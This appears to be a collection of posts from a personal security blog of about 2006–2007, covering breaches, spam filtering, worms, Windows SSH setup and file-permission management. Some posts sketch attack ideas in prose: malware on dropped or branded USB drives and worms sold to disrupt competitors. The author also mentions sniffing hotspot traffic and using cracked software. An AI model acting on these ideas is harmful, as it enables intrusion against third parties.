UCLA just announced the disclosure of private data on 800,000 persons. I find it disturbing that the "attacks occurred between October 2005 and November 2006." I almost suspect that that is only as far back as backup tapes and/or logs go. And there were multiple attacks? I would be willing to put money down on the detection being accidental on the part of the network admins. Maybe someone just looking at something they normally don't, or seeing something odd when troubleshooting an extraneous error as opposed to an IDS barking alerts or alarms going off or the attacker(s) being noisy.

Information security and insecurity isn't going away, and it is very hard to ultimately protect juicy targets. IT is understaffed and underbudgeted. We complained about this 8 years ago and we still complain about it because technology and information have grown along with staffs.

We also have an inability to share information. We work in an industry that cannot disclose details without the very real fear of lawsuits. But we desparately need to share this. We need to share what broke down in UCLAs detection strategies. We need to share how they learned of the incident and investigated it. We need to share the goods and the bads, what works and what doesn't work, the internal political barriers and the champions who push through them. Otherwise this issue just cannot go away and we'll only have analysts and journalists telling us (and our management) what "should" be done with absolutely no regard to the feasiibility of those measures. (Of note, I love analysts/journalists telling companies how easy it is to encrypt full hard drives just because they were able to encrypt their own hard drive once, two weeks ago, and then didn't like it and removed it...)

If we are to start making headway, we need the details. Otherwise the details, in their silence, will kill prevention.

Ten years ago, it was still common to refer to hacking groups by their creative and rather dark names like Cult of the Dead Cow, and handles like Master of Disaster. These days, hacker criminals (note the use of the adjective "criminals" to quality an otherwise non-negative "hacker" noun) have matured their practices from just being curious and annoying and destructive to being profitable. But so have the security pros. While there are still people like Major Malfunction and Phenoelit around (and many, many others), just look at my list of links to the right, especially the blogs. I now have more real life names than I would ever have had 10 years ago.

That's not to say hackers do not have witty handles anymore, but there is that maturing going on in all facets of this industry. Curious, if nothing else. Me? I like the ability to use a handle to protect my identity online just a little bit more. Games, forums, IRC, IM...everything still asks for a unique username, so may as well blend that in with my industry handle. Better than being Avengerr26078 or Neo643389x!

The Open Relay Database service has called it quits finally. ORDB provided a blacklist of known and/or suspected spamming SMTP services based largely on IP addresses.

This was always a bad idea. I dislike lame workarounds for a problem inherent in the protocol itself: lack of authentication. Trying to tack on security just won't work here. You might be able to shun a large swath of spam, but you also catch a lot of dolphins in the net as well. Take me for instance. My home mail server is on a DSL or cable line. The ORDB labeled my connection as a home-based system or even "dynamic IP" and thus anyone using their blacklist dropped any email I sent. Most companies that used this blacklist also did not accept free mail services like Gmail and Hushmail. It truly made communicating with some companies extremely problematic. I never did get a response from ORDB about my reservations (to put it lightly). You can drop 100,000 spam messages and no one will care. If you drop 1 extremely important email from a VP, heads roll. This does affect most any spam protections, but shunning by IP is not the solution.

Likewise, I've heard tales of legitimate companies being placed onto the blacklist, and having a huge hell of a time trying to get off the list. There is no real definitive threshhold or line drawn where, when complaints cross it, the site is put on the blacklist. This means that the larger the institution, the more likely a few clueless people will report legitimate mail that they requested, as spam, and screw up the company. Not a cool model.

So, rather than just complain, what do I recommend? Honestly, I'm not sure. There must be signature-based detections, but that relies on someone keeping the signatures updated (outside service). This should be accompanied by automatic denial of certain types of emails, such as emails with .com attachments and so on. There should be some measure of bayesian/subjective analysis, but that can't be terribly draconian otherwise legitimate emails will be dropped. When it comes to my home network, I'd rather delete a few rogue emails than lose a few mis-categorized emails. I also believe in layered defenses, so this network-based detection can be augmented by utilizing any client-side "junk" filters. Most email programs today include some sort of manually-configurable junk filter that can "learn" as you use it. Utilize that for anything that gets through the initial procedures.

The rules change a bit when you talk about corporate email systems, however. No one wants their users to get even any spam mail, let alone something offensive or not appropriate. In a corporation, I really believe either the company needs to accept some measure of spam (typically smaller companies with less budgets, who also may be more needing to see emails from servers like mine) or spend the money to fully outsource it to a professional spam blocker. For comprehensive and intelligent and highly accurate spam blocking, I feel no company can do this alone. We use Postini at work, and I have to say I've been quite happy with it. Basically get a service upstream, filter emails, and then receive only the good stuff. This helps take pressure of corporate IT to become spam experts 24/7. That's just not practical.

Ultimately, I'll have more opinion on this after I play with SpamAssassin some more. I really do believe SMTP is a good protocol, but the Internet has grown larger and more depended-upon than SMTP was designed for. I consider it an already-dead technology that will linger for many, many more years simply because of the low cost and ease of usage. It will eventually be replaced with voice services or SMS and messaging services. The only effective difference between email and IM is the ability for mail to be held on the server until the user logs in and retrieves it. Yahoo does this in IM and has done it for years, and Google continues to make Gmail and GoogleTalk features more and more overlapped to achieve that switchover.

One author has dubbed 2006 the year of the breach. I disagree. I think this year is the year when the blanket of ignorance has started sliding off. We've not had more data disclosures or identity thefts. We've just heard about them more than in previous years. Laptops have always been lost and data has always been on them that should either not have been or at least encrypted. This is not new. But our talking about it in mainstream circles and media is new, especially in light of erected regulations forcing such disclosures.

In addition, drivers, particular wireless ones were outed throughout the year, and all those quiet little problems with their code quality have come to light in quite dramatic fashion. This is still a fairly quiet problem, however, probably because unless you're installing a new system or a gamer, no one really regularly updates drivers. People still want to just ignore the problem.

Web 2.0 started getting beaten around a bit as application developers are still pounding out insecure code, but several researchers showed us that this is all deeper than we thought. Javascript and HTML are capable of very similar attacks and recon exploits. We all feel a bit less safe on the web as a whole. The Month of Kernel Bugs has opened eyes to kernel issues, full disclosure, and software patching processes in open and closed source projects.

While few of these issues are truly new, and nearly as many are still not really solved, at least we're talking about them in public and they are getting attention. We can no longer live with self-inflicted ignorance in management who would rather not think about a lost laptop and be even less inclined to admit to anyone that one was lost when it does happen.

(note: I will be removing these as I read them.) update: I've decided not to remove some, as they as "classics" and I'd like to keep the link for my future possible reference

This GIAC practical paper is a massive look at the firewall stance of a fictitious company's complicated network. Very detailed paper and I really look forward to reading it someday soon.

A paper on discovering wireless discovery tools like Stumbler.

A paper on detecting wireless lan mac spoofing. A bit dated, but still a nice little bit of knowledge to have when looking into wireless forensics and traffic.

A fictional Red Team Assessment paper. This paper is a practical for a GIAC certification. Interestingly enough, it is actually a response/engagement to a previous GIAC practical paper submitted by another certifyee.

A short paper from Joatblog on fingerprinting, but also contains a nice list of resource links at the bottom.

And this is why you block ICMP (or at least monitor it closely): ICMP tunneling. This is a vein of project I've been wanting to do for some time now, along with an SSH tunnel that I can set up from anywhere and use things like an wireless hotspot and still maintain a good measure of privacy.

A paper on how to install a secure Linux web/mail/dns server. Requires .pdf viewer.

Part 1 of a series of papers on Linux Security. Tons of links to other resources at the bottom.

NSA's 60-Minute Network Security Guide. A nice little overview type of read that covers as much as some network security books cover. Nice little inspiration and start to getting into a mindset.

An article on understanding tcp reset attacks. Have yet to read this one.

Univeristy of Washington course on modern cryptography has been placed online. Might be some good material to read on a rainy day.

I read Bruce Schneier's weblog on a pretty much daily basis, and I truly appreciate what he brings to security punditry, especially things outside of strictly network and computer security.

But the more I read from Bruce, the more I am convinced that stories he points out will be forever and universal. There will never be any type of security that relies on people that cannot be circumvented, even if by accident, one time out of 1,000,000. It fuels people like this because the stories will never go away. People will always make mistakes and someone somewhere will point it out and make everyone else cry that we should have 100% perfect security and spend more money to get that last .01% failure rate removed. That's just not always realistic. The effort is nice and I do appreciate his efforts to keep people from being blissfully ignorant about what security really is versus the perception, but he is like sugar to me. Take samples of it, not heaping spoonfulls, for best enjoyment.

Maybe I am a bit old-school already, but I like the sound of this news post:

Due to an increased network threat condition, the Defense Department is blocking all HTML-based e-mail messages...

The JTF-GNO mandated use of plain text e-mail because HTML messages pose a threat to DOD because HTML text can be infected with spyware and, in some cases, executable code that could enable intruders to gain access to DOD networks, the JTF-GNO spokesman said.

In an e-mail to Federal Computer Week, a Navy user said that any HTML messages sent to his account are automatically converted to plain text.

This is one of those battles I resoundly lost in my last job: forcing Outlook to display emails as plain text. I'm one of those people who sees absolutely no need to make emails look pretty with embedded pictures. Marketing and sales think otherwise, of course. As far as my own emailing habits go, I'm pretty strict about making my outgoing emails all plain text, and most incoming mail plain text as well. You eliminate huge swaths of attacks by turning off HTML rendering in email programs...enough that really you're left with sheer stupidity in going to links or running attachments, and you avoid all that hidden junk with javascript, remote calls, and misleading links.

If something needs to look pretty, put it in an attachment or link to the website inside the email body.

KListon over at the SANS Handler Diary recently posted about worms and how we won't see an SNMP-borne "Slammer-like" Internet worm, or maybe even any worms like Slammer, despite the opening given by MS06-074.

I think he is somewhat correct. The Slammer worm exploited SQL instances and caused a huge amount of havoc because of the unintended effect of flooding most networks with packets, to the point that they were unusable. From worms like this, authors have learned that if they want to have a good worm, you don't want to overload your own pipelines. Rabbits may multiply like nothing else, but once you get 5,673 of them stampeding over a bridge to get to new food sources, the bridge will collapse and they're all dead in the water, so to speak.

I think kliston's best point was the oddity of tons of tcp 1434 ports open to the world. This defies the common sense that administrators of today have, where databases are (should!) be nestled deeply inside the network behind a few layers of protection between it and incoming Internet traffic. Firewalls have been built up quite a lot over the years, and I think many networks are much more resilient to network-borne worms coming from a public network. Unless something is able to pop apps on commonly opened ports (we're probably looking at IIS/Apache, sendmail/IIS, SSH/telnet, BIND...) that are widely used, I don't see any major outbreaks on the horizon. What we're then left with would be widespread apps running on IIS/Apache (Web 2.0 or common packages like phpBB) or perhaps IM propogation should something in a message be able to pop the app. And of course, some discovery in Cisco equipment could be catastrophic as they make up more of the bricks in our perimeters.

Now, that may nicely cover Internet-borne worms attacking over the dangerous public networks, but that is not to say there won't be pockets (sometimes LARGE pockets) of an SNMP worm. Even beyond the heyday of the Slammer worm there were still terrible outbreaks as laptops took hold and developers moved offsite with Slammer-susceptible MSDE instances. Once back into the comforts of the home network, such instances gobbled up any unpatched systems and vomited out onto the network wires. Similarly, an SNMP worm can piggy-back inside a network as well, or be delivered via email or other means. Once loose inside a network, it can still have a catastrophic effect for locally.

I have heard often that the network perimeter has disappeared. I disagree with that. Our networks have simply become more ephemeral, kind of like the kids starting to play outside the house and getting dirty by dinnertime. The house is still there; the perimeter is still there. I imagine as ipv6 starts to get realized (someday?) the calls will arise to do away with NAT and the perimeter once public address-space is again limitless. But, of course, that would pave the way for worms to come out of hibernation, so I hope that the perimeter is going nowhere even with ipv6.

Kliston's third leg mentions something lots of people have repeated all year long: malware authors have become more interested in profit than notoriety. Well, how about being paid to disrupt a competitor's network? And you just happen to have the ability to create an SNMP worm? And what if that competitor has poor network design and utilizes SNMP on his internal servers, and has a long cycle before those servers get patched? You might be able to realize this financial gain by sending your worm packaged into an attachment over email or perhaps scatter some USB flash drives in the parking lot (with eye-catching glitter-bits painted on to attract attention) with the worm autorunnable. All it might take is one execution and bam, their servers go from the same ol' grind to being tickled lightly to flat out all raising a new flag of ownership. Dramatic, yes.

Or, hang out at a local wireless hotspot that the employees frequent. With their laptops. Once away from the hardened corporate network, those devices may be ripe for the picking...and planting of a worm. Maybe corporate epionage is already here, but I suspect it will continue to get worse, whether the media picks up on it or not.

The Chaos Communication Congress, now in its 23rd year, has always been one of those conferences that gives me goosebumps to think about the innovation, creativity, and genius all packed into one place for a short amount of time. I enjoy watching many of the presentations after the fact as they are quite open about distributing them. They feature some amazing ideas and technologies and tend to be a bit more open about challenging governments than US cons. One of this year's bigger attractions is RFID tracking. I think it will be interesting to see tracking being brought more and more into our mainstream thinking. Much like the ipod+Nike revelation recently.

Also, DNS should be propogated by now for wiki.terminal23.net. Mediawiki freaked out last night when I changed the URL and Virtualhost for the site, but a quick reinstall made it happy again. I don't have much there and it will just be intended as a resource for me to track tools and tutorials, but I have started moving down that road enough to link it up from here.

Somehow this site slipped through my RSS feeds net, but the Security Catalyst has had a few interesting updates in the past month.

First, David Stern talks about VPN not being a security device. I think this can be confusing because I think I was linked to this post via someone saying VPNs offer no security and citing David. VPNs do provide security by encrypting traffic over a public network. Although I do understand what David is trying to say. Typically, VPNs do not use more sophisticated authentication than other remote access methods, nor provide any further traffic protection beyond the VPN endpoint. If you let me VPN into your network, you'll have to deal with the fact that I might make connection attempts to Gmail or spew out Slammer traffic. Point made, but I think his point can be far too easily mistaken. At least the post made me sit back with a screwy look on my face for a few minutes! I tend to be a natural skeptic.

Second, is a post about explaining SSL security. This made me giggle: get a group of nearby people together and go over the security that SSL provides. Now, yes, I can explain SSL accurately, but I gotta be honest, even at work about zero of those people are going to give a shit about the details, even if spoken in elementary terms. I've worked at web-tech companies where I filled requests from people (developers and managers) for SSL certs, who themselves couldn't care less about the technical reasons. "The client requires SSL and Sysadmins get annoyed when we don't put them on," was the only real care; just a checkmark to filling the client's needs. Again, though, I see the point: education. But I doubt many people truly care what SSL is and how it truly works.

Here is a case in point. Go to MySpace.com and log in with your username (come on, everyone has one). Notice there is no https/SSL transaction? Yup, that's how much people truly care about SSL: MySpace.com's popularity doesn't seem so affected. (I discovered this one over a year ago at a wireless hotspot whose traffic I was snooping on...) Yes, perhaps it is not a banking site...

One piece of marketing schwag I like to get are various small USB drives. I have a handful of Dell 64 MB keys that I use regularly, especially when with buds offsite. I wonder how hard it would be to order some USB keys printed with another company's logo, and then give them away at a tradeshow. Oh, I should mention that they can then be loaded with some malicious apps to infect any system they are plugged into and then call home after a few weeks. Or try to delete all files on the network the vitim has access to. I wonder what kind of lashback that might send to the company whose logo is on those drives? We've had Sony putting rootkits on cds and some ipods delivering trojans, so when are we going to see the first high-profile case of USB exploitation? And I'm not talking a pen-test effort, but an actual criminal case.

I'm not an author like Bejtlich, but I do appreciate when he reviews books. I like reading reviews just so I can quickly weed out the bad apples and the good apples before buying something I'll wish I could take back. For my part, here are a couple of Ubuntu books. Just as background, I've run various Linux distros in the past for small periods of time, and I've supported Slackware boxes in a previous job, but I still consider myself a fairly new *nix user. Currently I dual-boot Ubuntu and WinXP on my main laptop, but I use Ubuntu 99% of the time lately.

Ubuntu Hacks is part of the really cool O'Reilly series of Hacks books. I've long enjoyed them because they take a specific question and answer it very succinctly and quickly. The authors don't spend a chapter or 15 pages over specific topics and thus don't get into much detail, but they get the hacks done. Ubuntu Hacks is no different and is really excellent to have for an Ubuntu newbie. I would recommend it for anyone with at least some familiarity with the Linux world. It might be worthy of being the only Ubuntu reference you need other than Google. Don't wait too long to get this though; like other Hacks books (and many "how to" geek books anyway) it will get outdated quickly.

Ubuntu Unleashed is a much thicker book that covers far more topics with far more depth than Hacks. Sadly, the authors seem to have just taken their Fedora Core Unleashed book and repackaged it as Ubuntu with some spotty word replacements and some Ubuntu specifics. It sucks to read about using Yum or Ubuntu Core in an Ubuntu book. Still, the book works for a newer Linux user like myself, but I wouldn't really recommend it due to the copied nature. In some places Hacks does in 2 pages what Unleashed barely gets correct in 10. With Ubuntu books dominating the Linux shelves at the bookstores, there are better Ubuntu books available than this one.

I'm not one for predictions, mostly because everyone else does them and I'm not necessarily an analyst. But I thought I would spit out what's on my mind. And no, I'll refrain from the obvious and take some more ballsy moves.

1. Efficiency is the name of the game with technology, not only in business but in criminality as well. Think of all the scams and attacks that have been performed for decades (plagiarism, fraud, identity theft, data theft, credit card skimming, phone phreaking, spam/junk mail, music/movie bootlegging/copying...). If there are some out there still untapped as a technological attack, they will start getting tapped. As phones and VoIP converge and cross international lines, so to will we start to feel the return of phone scams and telemarketers as call prices plummet and laws are unable to cross borders.

2. Several people made headlines this year, and maybe you could say they broke out. HDM, LMH, Jeremiah Grossman, and RSnake are the memorable names. The first two are pushing fuzzing; the latter two are abusing web attacks. That foursome and their lesser-known buddies and pals are the nucleus of active white hat hacking and disclosure. None of them are done yet, and I think 2007 will see a lot more activity and revelations from all four. What ports do people open on firewalls? BitTorrent and P2P. Fuzz those apps and we might find another worm for home systems.

3. With the widespread dismissal at how potentially dangerous wireless driver attacks can be, I still expect to see this minorly erupt. Granted, we won't see huge wormable activity, but damn is it nice that drivers are rarely updated and they are insecure still. I expect more news here and maybe a few landmark incidents in the wild. I wouldn't be surprised if governments and corporations are not already abusing this front in more targeted attacks.

4. You can't predict something in 2007 without thinking about botnets. Nothing scales better right now in the threat landscape than botnets. From DDoS to extrortion to DNS attacks to just taking your 20,000 infected hosts and stealing host information; It's going to be worth money to someone. I expect these to get more sophisticated as botherders realize the true power they have. I wouldn't be surprised to see some of the compromised systems get special attention as a stepping-stone into behind-the-firewall recon and attacks. A .gov bot? Cha-ching! We have no real counter to botnets right now, and this war can only escalate. How about that SNMP worm that people think won't come? Release that via the bots and you can have a lot of fucked up networks despite strong firewalls.

5. Regulations and standards will start to be questioned as data disclosures and high-profile attacks won't go away. Just like government report cards being useless, so too will standards compliance checkmarks. Just like "Hacker Safe" meant nothing to some websites that were still full of holes, so too will "XYC 21300 compliant" mean nothing. Organizations are too different and complex and the threats too different for standards to really be effective. Mgmt won't understand that for a few years yet. (On a similar note, as security moves into unified super-applications that try to do everything from one mgmt console, the skills of admins to understand the underlying technology and do things with free lower-level tools will become dangerously low in many organizations...maybe not in 2007, but ongoing.)

6. Lastly, da bears will finally win another Super Bowl.

Just finished standing up an OpenSSH server on a Windows box mostly just to do it for once. I know, I know, it should be Linux. But I firmly believe this is a Windows world and like it or not, this request will someday come up just like this. I'll put a Linux one up on my next box.

All told, there are plenty of sites around that walk through setting up SSHD and Cygwin on Windows. Sadly, they all seem to leave the unsuspecting user very insecure. These commands are always listed:

mkpasswd -cl > /etc/passwd
mkgroup --local > /etc/group

These commands copy Windows users and groups over to the cygwin environment. Yes, that includes accounts like Administrator and any other group that exists. There is a reason that "root" is and should be denied login via SSH: it is an ultimately predictable account to brute! Well, I would bet that on many Windows SSH installations, Administrator is likely pretty predictable. To get around this, I just remove those users in /etc/passwd.

This just reminds me that security is not something everyone thinks about. And too often instructions that get passed around are not the most prudent instructions. That's great that a lot of people who likely shouldn't be allowed to, can now set up SSH servers on Windows and plop them onto the Internet and they work just fine. I guess it just takes a little more knowledge to know about the potential issues and then to solve them. I hear a lot about how security needs to be baked in, and while I agree, I think it will be a long time coming and will always cost either time and effort or money. (The same holds true for physical home security...)

Over time, sometimes I get a few little pet peeves built up and I tend to use my blog here as a way to release those peeves. So today is deemed "rant day" and I'm going to shoot out a few small items that bother me.

community peeves
I understand that we're a worldwide community and as such, English is not everyones first language. That's cool with me. But I dislike seeing English-speakers just massacre the language. Constant grammatical errors and broken sentences make Jesus want to punch babies.

Reading comprehension. This is a big one. You can almost tell when someone has read the first three lines of a mailing list email and spits out a reply to just those three lines; completely missing the rest of the message. Sometimes they give really good answers...to the wrong questions.

People who argue that there is only one right way to do something (their way). While protocols have not hugely changed and some things are very much the way they were 10 years ago, environments and business uses are vastly different. What works in one environment will maybe not work or be acceptable in another.

Saying there is no silver bullet to security, then pointing out how everything is broken just because it has one problem or two. This creates a nice little unachievable paradox. I see this used a lot by analysts who refuse to be wrong. I think the only acceptable solution to them is if Jesus sends down a sword-bearing angel to protect the data.

workplace peeves
Making work requests without providing the reason, authority, or problem that is being fixed. "I need access to John's files." Please explain the request in context so that we're not just making willy-nilly changes that may or may not fix the problem and may or may not be authorized. I think I see this in the workplace more often than any other pet peeve of mine.

Reading comprehension. My last job was not so bad at this, but my current company is just downright terrible when it comes to email coherency and reading comprehension. I purposely send out emails that are 2-3 sentences long to get right to the point, and people still don't read. Just yesterday I got a request to stand up a new email account. I replied back asking who needs access. The response I got back was, "It doesn't work yet." Jesus is starting to kill kittens now.

I love when users engage multiple people on a problem without telling anyone, i.e. abusing support processes or authority. Sometimes some people ask each IT employee their question until someone gives them the answer they want. Sometimes people escalate everything they don't get their way on, complaining to everyone until it is done. Others with authority sometimes engage 3 people to get their important task done, without realizing those three people may be stepping on each other's toes and wasting 2 of those people's time and possibly breaking other things in the process. If 3 people are going to work on a problem, I'd rather work together and share ideas than each of us secretly working separately.

I am embarking on a new project with a good friend of mine. I have taken one of my older laptops and installed an insecure version of Windows XP onto it. The insecurity has a number of different levels, and includes some vulnerable third-party services as well. The goal of this is to give it to him for a week and have him break into it. I've even put some fake services up that give back fake banners and capture whatever he does to those services. Maybe in a few more weeks, he'll set one up for me in similar fashion. If he breaks into the box, he has to show me how he did it. If he doesn't, I'll show him what I had in mind for an attack (i.e. there has to be a known and demonstratable attack vector).

The point of this little game will be not to stump each other by creating hardened systems or to try to find some 0day (we're not that sophisticated by any means!), but rather to just practice what we know, be aware of how security holes are created and where to look for them, and show each other different tools and ways to do things. Maybe after I have done this I'll post more details, but I certainly don't intend to do something profound or amazing with this.

Tracking user access in a corporate network is one of those, "Don't say that very loudly!" topics. No one likes to think about it because everyone knows they suck at it and trying to get it under control is a frustrating exercise. But what if you absolutely have to do this?

If you're like most small- and medium-sized companies, you use some sort of Windows-based file server and manual permissions management with Active Directory user accounts. Nothing could be messier when not managed properly. I've recently had the pleasure (?) of tackling such a project in my company. If you've ever utilized cacls/acls tools to dump permissions lists in folder shares, you know they can fill up all the rows in a .csv file and more, even for a medium-sized file server.

Here is my approach in four major steps: 1) take inventory, 2) file permission organization, 3) account organization, and 4) data ownership. The goal of this project is to be able to answer the following questions: Who can access data X? What does person Y all have access to? What is the process for requesting access to data Z?

1. Take inventory
The first order of business is to measure the pain. Grab a trusty Windows permission enumation tool and dump the permissions on all your file server shares, including all subdirectories. I recommend limiting yourself to folders and not including files. Windows files are very annoying in their permissions and will inject a lot of weird data into your intial acl dumps. The best tool I've come across for reporting on permissions is ScriptLogic's Enterprise Security Reporter. This is a commercial tool which does more reports than just permissions, but the ability to report permissions in configurable ways is invaluable. They have a 30-day trial on this product. You can create reports that pull out what a user has access to, as well as who all has access to a particular folder including pulling users from groups in AD. Check out your file servers and all the folders you expect to have different permissions and see how accurate things are or are not. Take a deep breath, and move on.

2. file permission organization
Next, you have to determine how you will be doing permissions in the future. Here are my recommendations:

- Do not use the DENY right! This rarely shows up in reporting tools and is just frustrating to use.
- Do not use complicated subdirectory permission changes. You want to use permission inheritance as much as possible. The reason for this is accidental changes to permissions that are pushed down to all subfolders and files will overwrite all subdirectory differences. Oops! Eliminate the possibility of this very real mistake by being as flat as possible. Do only one or two levels of permissions differences; I prefer just one level. Our file server for departmental and team folders is I: on the desktops. From there, we do I:\Accounting, I:\Sales, and so on. Each of those folders has its own permission structure, and that's it. No odd I:\Accounting\SuperSecret\ folders with different permissions. If they need that, it can become I:\SuperSecret\ and be on the same level. Anyone who has worked with complicated permissions structures will no doubt be able to tell amazing horror stories.
- Use only those permissions that you need to use. For almost everyone, this can be narrowed down to Modify and Read-Only. Don't get fancy with Change or List or others.
- Use as few explicit permissions on folders as possible. - Do not use EVERYONE or AUTHENTICATED USERS. User Domain Users if you absolutely must have a share open to "everyone."

By following these guidelines, you accomplish a few things:

- Reduce the chance of permission inheritance mistakes.
- Improve the ability to pull accurate permissions reports.
- Decrease the amount of time and effort needed to make permissions changes and re-establish permissions (you can just push down permissions from I:\Accounting to all subdirectories and not worry about what you're wiping out).

3) account organization
While ScriptLogic has a nice tool to pull access reports, it is still yet another program for staffers to learn and, really, you can do much the same thing with some effective use of Active Directory accounts and groups.

For every folder on your file server that needs different permissions, create two groups to hold the users who will use those permissions: Read-Only and Modify. For I:\Accounting, I would make the groups Accounting Folder-Read-Only and Accounting Folder-Modify. Then anyone who needs Modify access to Accounting should be placed into the Accounting Folder-Modify group. Apply both of these groups to the explicit permissions on the folder with their respective permissions. This should mean you will have only a few explicit permissions on each folder: SYSTEM (likely), Adminstrators (likely), the Modify group, and the Read-Only group. Nice and clean!

One caveat to this approach is in the way Windows handles group tokens. When a user logs into their computer, the logon process will inform that computer which groups the user is a member of. If the user's group memberships change, their current session will not get the updated group membership information until the user logs out and logs back in (I typically just tell people to reboot, as they understand that better).

So all permissions changes will now require you to put that user or groups of users into the proper permission group, and then have them reboot. In a way, this is much easier than logging into the file server and updating permissions directly on the folders.

The biggest benefit, however, is in the ability to report on access. If you want to see what John Smith has access to, you just have to see which groups he is a member of. You'll see Accounting Folder-Modify, and it is quite obvious what he has access to. Likewise, if you check the members of the Accounting Folder-Modify group, you will see who all has access to that folder. Quick and simple!

One last note about AD organization, it really helps to have a very updated and group-based AD organization. Every employee in the company should be set to report to someone else in the Ogranization tab, and they should belong to some sort of role-based group. Accounting employees should be in the Accounting group, and so. This way you can use groups instead of individual users when placing people into their Modify and Read-Only groups. This is tough, however, if HR is not very clear about the roles people play, or if the department and team names change frequently and without warning.

4) data ownership Lastly, if a company is going to take permissions and access seriously, then ongoing support needs to be able to question requests made for those access levels. John Smith shouldn't just be able to request access to the Sales folder to the Help Desk himself. Someone has to authorize this access. Unfortunately, while most would think his manager is an appropriate authority, in reality, his manager typically has no idea what sort of information is in the store and will likely not do anything that prevents his employee from being productive.

A solution to this is similar to the Discretionary Access Control (DAC) method where data owners are assigned to data stores. The Accounting folder would be assigned an owner. This owner is then responsible for authorizing who has access to that folder. As part of that responsibility, that data owner should also know what sort of data they are a custodian of. If there are sensitive documents in the data store that some departments should not be privvy to, the data owner should know this.

Accounting or Human Resource file shares are perfect examples of this sensitivity. The Help Desk should not be blindly granting this access just because a user requested it.

Some other tasks:

- regularly report permissions, both in AD groups and in explicit permissions. This will definitely show you how Windows "copy" screws with permissions. Likely, you'll want to regularly "re-push" inheritance down through each folder so that you can refresh the cleanliness of your permissions reports.
- reports should be given to data owners for their review
- make sure all permissions change requests are clear, explicit, and tracked, such as in a help desk ticket system. Don't assume Bob J. means Bob Jones. The requestor should be as explicit as possible so that Bob Johnson doesn't accidentally get access to HR.

There are plenty of other caveats and approaches to doing user access security in a Windows environment, and quite a lot more work than is described here, but this should at least give some good ideas on an approach that I think works pretty darn well.

I can't believe what I'm reading as I catch up on news from the long weekend. There's a lot of things suddenly being found that I need to look at and/or evaluate. I would have better links, but I can't browse some sites without being flagged while at work.

VLC Media Player has a bug in even the Windows version. So much for trying to hide from Windows Media Player.

WinZip (not that I necessarily use it, I think I still just use an old cracked version 8 or 9 copy and have been looking at open source alternatives lately) has a bug in it that now has exploit code released.

XSS Vulnerability leads to G-Mail contact list disclosure. Guess it is time to add to the list of things people should do to stay safe: always log out of web sites when you are done using them for your session. This is becoming more and more necessary.

Daylight Savings Time is changing (whoa, boy, a silent and likely more potent "y2k" issue?).

Symantec still has lots of vulnerable installations out there, and they are growing, which is a bit disconcerting.

Update: I forgot about Adobe!

Just posting this here for my own benefit. Off and on since about 12/12/06 I have been seeing SYN floods (nothing huge, just a trickle) coming into my web servers on port 80 tcp and apparently coming from systems at softkit.ro and evolvatelecom.net (both European). I've not thought much of them as they are not huge and I've had other things I've been busy on, but this afternoon I did a check. I found this on the mynightwatchman.com site:

We are aware of this problem, but it is not originating from our network. As of last month we are the target of a DRDOS attack coming from the internet. From what we’ve gathered the attacker is sending source-IP spoofed SYN packets to a very large number of web servers (including yours - directed at port 80 only), the result being those servers flooding us with SYN+ACK packets afterwards.
We’d love any help from you on this matter, given that you have extensive logs on your affected servers.
Something of interest would be that we are not receiving any RST packets so this lead us to believe the attacker is probing the ports on the machines he’s using subsequently and not sending the packets blindly at random IPs.
As you can imagine, this is very disturbing for us too, but we have found absolutely no way and no support in catching this attacker. We would appreciate any support...

That pretty much sucks.

First of all, I have a new link in the dashboards section. I like dashboards. Management goes gaa-gaa over dashboards. That makes me like dashboards even more! I've never linked to it (amazingly) on the menu, but I just added one for the F-Secure Worldmap which is kinda cool.

Now, that dashboard is pretty pastel-laden. However, check out the wallpaper pics of what the F-Secure internal, realtime dashboard looks like. Pardon me, but that's fuckin' awesome!

"If you can make it clear what is to be rewarded and what punished, make your directives reliable, keep your machines in good repair, train and exercise your officers and troops, and let their strengths be known so as to overcome the opponent psychologically, this is considered very good." -The Art of War, Chapter 3: Planning the Attack

The Muse (yeah, I'm stealing a concept from my days of writing...maybe I should call this my Geek Muse?) visits at some odd times. I saw a post on Security Renaissance about a new method of staying ahead of phishers as posted on the F-Secure blog. For some reason before I even clicked on the link, I quickly thought about a device in front of the spam filters that scans every email for links and compiles them all into a greylist. That way when corporate users receive an email, any links in that email will already be either blocked or placed into a higher level of alert, perhaps on a web proxy.

For about 2 minutes I thought that was a cool idea, but then I did think about how many legitimate email links would get flagged. So maybe that is not so much a cool idea for a corporate network, but for a company whose lifeblood is email or email/spam/virus protection, a realtime catcher like that along with human bodies evaluating the trends and list of sites would be valuable. You can't always wait for the spikes in traffic or the reports from users AFTER they have received all the phishing emails and gone to those sites and turned their computer into a bomb. Either way, this is still reaction, just higher upstream than most people tend to react, and not technically prevention.

Chances are, the big boys in this field already do this, but thinking about such things makes my brain smile.

IE has been beaten up over the years, and now that Firefox has gained ground, it also is under fire. While Office has been beaten up last year, now perhaps Open Office will be subjected to the lean eyes of the hacking underground. This post by Brian Krebs is timely, but I particularly love the first couple comments; the first about Open Office, and the second about a just-today-released-patch for an issue in Open Office. As applications keep getting attacked, especially Office and web browsers, more and more people are scattering over to lesser-known and oft-times free software to accomplish their tasks, myself included. But just because it has not been hit yet, does not make it secure. It might be a little bit safer to use as the odds of an attack are lower, but obscurity alone does not necessarily provide security.

Andy, ITGuy pointed out an article on Computer World 10 things to do to be more secure when using public wireless hotspots. Nice article.

The good tips that will slowly disappear as Windows fixes its wireless management:

- disable ad hoc mode
- turn off network discovery

The just plain good tips:

- turn off file sharing
- disable your wireless adapter when not in use
- turn on your firewall
- watch out for shoulder-surfers

Then Preston has a few more interesting suggestions. He suggests to encrypt your e-mail, but sadly gives no more information about how to accomplish this. For most consumers, they will stop there, give an annoyed huff, and skip that step. Encrypting one's email is not as easy to many users as it can be, and is completely email provider-specific. It might be as easy as changing a couple connection settings in the client, or as complicated as figuring out PGP or some other service that claims secure email (by simply never transmitting it off their webmail servers and forcing your recipients to make accounts to retrieve the mail...bleh!). Some users will just be out of luck when it comes to secure mail transmission and won't have corporate recourse for checking mail beyond port 110 and cleartext messages. In those cases, just don't do it.

Carry an encrypted USB drive. I'm not sure if this is worthy of a bullet point, but if someone will be going through the trouble of using an encrypted USB drive for data, why not encrypt the whole laptop disk? Besides, if an attacker takes over the system, they should be savvy enough to impersonate an admin or the user and access most encryption. It makes some sense, but I think it is more effort than is necessary. I dislike having to track multiple "portable" devices, especially ones that can be lost as easily as a USB drive. To me, data encryption on the disk is a "data at rest" issue, not a wireless security issue.

